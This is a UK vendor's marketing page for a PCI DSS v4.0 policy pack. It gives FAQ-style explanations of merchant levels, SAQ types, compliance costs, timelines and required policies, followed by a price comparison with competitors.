Does outsourcing payments to Stripe make me PCI compliant?

Using Stripe Checkout or a fully-hosted iframe reduces your scope to SAQ A, which is the lightest version — but does not remove the need for PCI compliance. You still need documented policies, access controls, a documented data flow, vendor management over Stripe, and (under v4.0) monitoring of scripts on any page that interacts with card data. Our pack covers the SAQ A, A-EP and D scenarios.

PCI DSS v4.0 Policies for UK Retailers & SaaS

Q: Which PCI DSS version should I comply with?

PCI DSS v4.0 is the current version; v3.2.1 was retired on 31 March 2024. All new 'future-dated' v4.0 requirements became mandatory on 31 March 2025 — including targeted risk analysis, authenticated scans for e-commerce, anti-phishing mechanisms, and client-side payment-page script monitoring. Some organisations are already on v4.0.1 (released June 2024); our pack uses v4.0/v4.0.1 language.

Q: Do I need a QSA audit or can I self-assess?

It depends on card transaction volume. Level 1 merchants (over 6 million Visa/Mastercard transactions a year, or any merchant who has had a breach) need an annual QSA-led Report on Compliance. Levels 2-4 can usually self-assess via the appropriate Self-Assessment Questionnaire (SAQ A, A-EP, B, C, D etc.). Most UK SMEs are Level 4 and can submit an SAQ plus quarterly ASV scan.

Q: How much does PCI DSS cost for a UK SME?

Self-assessment (SAQ A/A-EP) typically costs £300-£1,500 per year in ASV scanning plus internal time. SAQ D self-assessment can require £3,000-£10,000 of consultant help if scope is complex. Level 1 QSA assessments typically start at £15,000-£40,000 for a UK SME. PolicySuite's PCI DSS Retail Starter Pack replaces the policy-drafting element so you only pay for audit time on controls, not paperwork.

Q: What policies do I need for PCI DSS v4.0?

PCI DSS has 12 high-level requirements, each requiring documented policies and procedures. Typical SME policy set covers information security, network security, vulnerability management, access control, monitoring and logging, security testing, vendor management, incident response, physical security, data classification, encryption and key management, and change control. Our pack delivers all 12 bespoke to your business.

Q: What does the PCI DSS Retail Starter Pack include?

12 PCI DSS v4.0-aligned policies covering all 12 requirement families. The pack is written for UK retailers and e-commerce SMEs selling through Shopify, WooCommerce, Stripe Checkout, or similar integrations. It covers SAQ A and SAQ A-EP scoping explicitly. Live pricing is shown on the product page.

12 policies mapped to all 12 PCI DSS v4.0 requirement families. Written for UK retailers and e-commerce SMEs — ready for SAQ submission or QSA audit.

PCI DSS v4.0 UK Retail E-commerce

PCI DSS Retail Starter Pack pack

12 policies · £400 one-off

Lifetime access · no renewal · v4.0-ready

Get Started — Buy Pack Free account · preview sample policies · buy pack when ready

UK registered & ICO compliant 197 frameworks · 8 jurisdictions · 990+ bespoke policies Lifetime purchase · no renewal

What is PCI DSS?

Quick answer. PCI DSS is the contractually-binding security standard for organisations that store, process or transmit cardholder data, maintained by the PCI Security Standards Council (Visa, Mastercard, Amex, Discover, JCB). The current version is PCI DSS v4.0.1 (effective March 2025), with 12 requirements covering network security, access control, encryption, testing and policy. Enforced via the merchant’s acquiring bank, not a government regulator.

PCI DSS (Payment Card Industry Data Security Standard) is the contractual standard governing every business that stores, processes or transmits cardholder data. It is enforced by the card schemes (Visa, Mastercard, Amex, Discover, JCB) via acquiring banks — not by a government regulator — but the penalties for non-compliance include fines, increased transaction fees, and loss of card-acceptance privileges.

The current version is PCI DSS v4.0 (v4.0.1 as of June 2024), with all future-dated requirements mandatory from 31 March 2025. Key v4.0 additions include targeted risk analysis, authenticated internal scans, phishing-resistant MFA, and script-integrity monitoring on e-commerce payment pages.

Who needs PCI DSS?

Quick answer. Any UK firm that stores, processes or transmits cardholder data — e-commerce merchants, payment service providers, SaaS firms with credit-card-on-file, and card-not-present BPOs. Scope depends on annual transaction volume (Level 1: 6m+, Level 2: 1m–6m, Level 3: 20k–1m, Level 4: under 20k). Even Level 4 SAQ-eligible merchants need the supporting policy set; larger firms add an annual QSA on-site audit.

UK e-commerce retailers — every Shopify, WooCommerce, or custom-built store accepting card payments.
UK SaaS firms that take card payments — either directly or via Stripe/Adyen/GoCardless.
Subscription businesses and marketplaces processing recurring payments.
Hospitality, ticketing, and events firms handling card-present transactions.
Service providers and payment processors — stricter requirements under Section 12.

Policies you need for PCI DSS

Quick answer. PCI DSS v4.0.1 Requirement 12 prescribes a documented information-security policy plus 11 supporting policies: acceptable use (Req 12.3), risk assessment (Req 12.3), service-provider management (Req 12.8), incident response (Req 12.10), security awareness (Req 12.6), encryption / key management (Req 3, 4), access control (Req 7, 8), change management (Req 6), vulnerability management (Req 11), wireless and remote access (Req 1, 2), and physical security (Req 9).

Each of the 12 PCI DSS requirement families needs documented policies and procedures. Our PCI DSS Retail Starter Pack delivers all 12, bespoke to your merchant scope:

Information Security Policy

Req 12 — overarching ISMS owned by leadership.

Network Security

Req 1 — firewalls, segmentation, network diagrams.

Vulnerability Management

Req 6 & 11 — patching, scans, penetration tests.

Access Control

Req 7 & 8 — need-to-know, MFA, session timeouts.

Monitoring and Logging

Req 10 — audit logging, log retention, review cadence.

Security Testing

Req 11 — ASV scans, pen testing, script monitoring (v4.0).

Vendor Management

Req 12.8/12.9 — TPSP list, AoC tracking, responsibility matrix.

Incident Response

Req 12.10 — CDE breach handling, card-brand notification.

Physical Security

Req 9 — device controls, visitor logs, media handling.

Data Classification

Req 3 — PAN storage rules, masking, truncation.

Encryption

Req 3 & 4 — key management, TLS standards, in-transit encryption.

Change Control

Req 6 — change approvals, separation of environments.

Realistic timeline to PCI DSS compliance

Quick answer. 3–6 months for a UK e-commerce merchant or SaaS firm to reach PCI DSS v4.0.1 readiness. Month 1: scope reduction (tokenisation, hosted-payment-page) is the highest-leverage move. PolicySuite generates the 12-policy set in 48 hours. Month 2–3: technical controls (segmentation, encryption, logging). Month 4: ASV scans, internal vulnerability testing. Month 5–6: SAQ submission (Level 4) or QSA on-site audit (Level 1–3).

For most UK SMEs on SAQ A or A-EP, 4–8 weeks from day zero to submitted AoC. SAQ D or Level 1 QSA assessments take 3–6 months.

Week 1: Scope assessment — map card data flows, identify your SAQ type, pick an ASV. Buy the pack and receive 12 bespoke policies in 48 hours.
Week 2–3: Fix common gaps — enforce MFA everywhere, enable logging, document network diagram, implement v4.0 script monitoring.
Week 4: First quarterly ASV scan, remediate findings.
Week 5–7: Complete the SAQ, collect evidence, sign AoC.
Week 8: Submit to acquirer. Set calendar for quarterly ASV + annual renewal.

Policy packs for PCI DSS

PCI DSS Retail Starter Pack

12 policies · £400 · all 12 PCI DSS v4.0 requirements

ISO 27001 Core Set

16 policies · £400 · broader ISMS for SAQ D / Level 1

InfoSec 38 Enterprise Pack

38 policies · £900 · full enterprise depth

Third-Party Risk & Contracting

10 policies · £300 · TPSP management Req 12.8/9

PolicySuite vs GRC platforms vs consultant vs DIY

Quick answer. PCI QSAs charge £15k–£80k for a Level 1 readiness engagement; smaller SAQ engagements run £3k–£10k. GRC platforms (Vanta, Drata) added PCI DSS mappings recently but at £15k–£50k/year. DIY templates often miss the v4.0.1 changes (custom-implemented controls, defined-approach vs customised-approach). PolicySuite generates v4.0.1-mapped PCI policies in 48 hours from £400.

UK SMEs typically compare four routes when sourcing compliance policies. Here's how they stack up on the decisions that matter.

	PolicySuite	GRC platforms (Vanta, Drata, SecureFrame)	Compliance consultant	DIY templates
Typical cost	£250–£1,500 one-off	£10k–£40k per year	£5k–£30k one-off	£0 + your time
Pricing model	Lifetime purchase	Annual seat-based	Project fee	Free (indefinite effort)
Time to policies ready	48 hours	4–8 weeks setup	8–16 weeks	Months — rarely finished
UK-specific content	✓ Built for UK SMEs	Partial — US-originated	✓ If UK consultant	Partial — boilerplate templates only
Bespoke to your business	✓ LLM-tailored from your answers	Partial — fill-in-the-blank	✓ Yes — manual	✗ Generic template
Framework coverage	197 frameworks · 8 jurisdictions	20–50 frameworks	Whatever the consultant knows	Up to you to find
Audit-ready evidence	✓ Acknowledgements, distributions, version history	✓ Strong — but seat-priced	✗ You track it yourself	✗ You track it yourself
Suits <50-person SMEs	✓ Designed for UK SMEs	✗ Price-prohibitive at SME scale	Sometimes — depends on scope	✓ If you have the time
Cost to switch away	✓ You own the docs — export anytime	✗ Lose access on cancellation	✓ You own the docs	✓ You own the docs

See full head-to-head comparisons →

Frequently asked questions

Which PCI DSS version should I comply with?

PCI DSS v4.0 is the current version; v3.2.1 was retired on 31 March 2024. All future-dated v4.0 requirements became mandatory on 31 March 2025 — targeted risk analysis, authenticated scans, phishing-resistant MFA for admin, anti-phishing mechanisms, and client-side script integrity monitoring. Our pack uses v4.0/v4.0.1 language.

Do I need a QSA audit or can I self-assess?

Level 1 merchants (over 6 million transactions/year, or any merchant post-breach) need an annual QSA-led Report on Compliance. Levels 2–4 usually self-assess via the appropriate SAQ (A, A-EP, B, C, D). Most UK SMEs are Level 4 — SAQ plus quarterly ASV scan is sufficient.

Does outsourcing payments to Stripe make me compliant?

Using Stripe Checkout or a hosted iframe reduces scope to SAQ A — the lightest version — but you still need documented policies, access controls, a data-flow map, vendor management over Stripe, and v4.0 script monitoring on any page that interacts with card data. Our pack covers SAQ A, A-EP and D scenarios.

How much does PCI DSS cost for a UK SME?

SAQ A/A-EP: £300–£1,500/year for ASV scanning plus internal time. SAQ D: £3,000–£10,000 of consultant help if scope is complex. Level 1 QSA assessment: £15,000–£40,000. PolicySuite replaces the policy-drafting element with a one-off £400 pack.

What policies do I need for PCI DSS v4.0?

PCI DSS has 12 high-level requirements, each requiring documented policies and procedures. Our pack covers all 12 — information security, network security, vulnerability management, access control, logging, testing, vendor management, incident response, physical security, data classification, encryption, and change control.

What does the PCI DSS Retail Starter Pack include?

12 PCI DSS v4.0-aligned policies covering all 12 requirement families, written for UK retailers and e-commerce SMEs on Shopify, WooCommerce, Stripe Checkout and similar. Covers SAQ A and A-EP scoping explicitly — see live pricing.

Skip the PCI DSS paperwork

Get 12 bespoke PCI v4.0 policies ready in 48 hours — lifetime access.

Get Started — £400

References and primary sources

Quick answer. The framework guidance on this page is reviewed against the primary-source documents below. Each link resolves to an official regulator or standards-body publication so an auditor, procurement reviewer or DPO can verify the alignment without taking the page on trust.

PCI SSC Document Library — the official PCI DSS 4.0 standard text and SAQ templates.
NIST SP 800-53 — the federal control library cross-referenced by PCI DSS interpretations.
CISA cybersecurity best practices — federal cyber guidance for retailers handling cardholder data.
ISO 27001 alignment — the cross-walk most acquirers accept alongside a SAQ.

In our experience working with UK SMEs and similar organisations across the EU and US, the framework pages that survive enterprise vendor reviews are the ones that cite primary sources rather than secondary blog posts. Many UK SMEs typically discover this only after their first failed vendor questionnaire — the reviewer asked for a clause-to-source map and the standard reply pointed at a marketing page rather than the relevant regulator. The references above are the standing set we cite from inside the policies themselves so the chain stays intact end-to-end.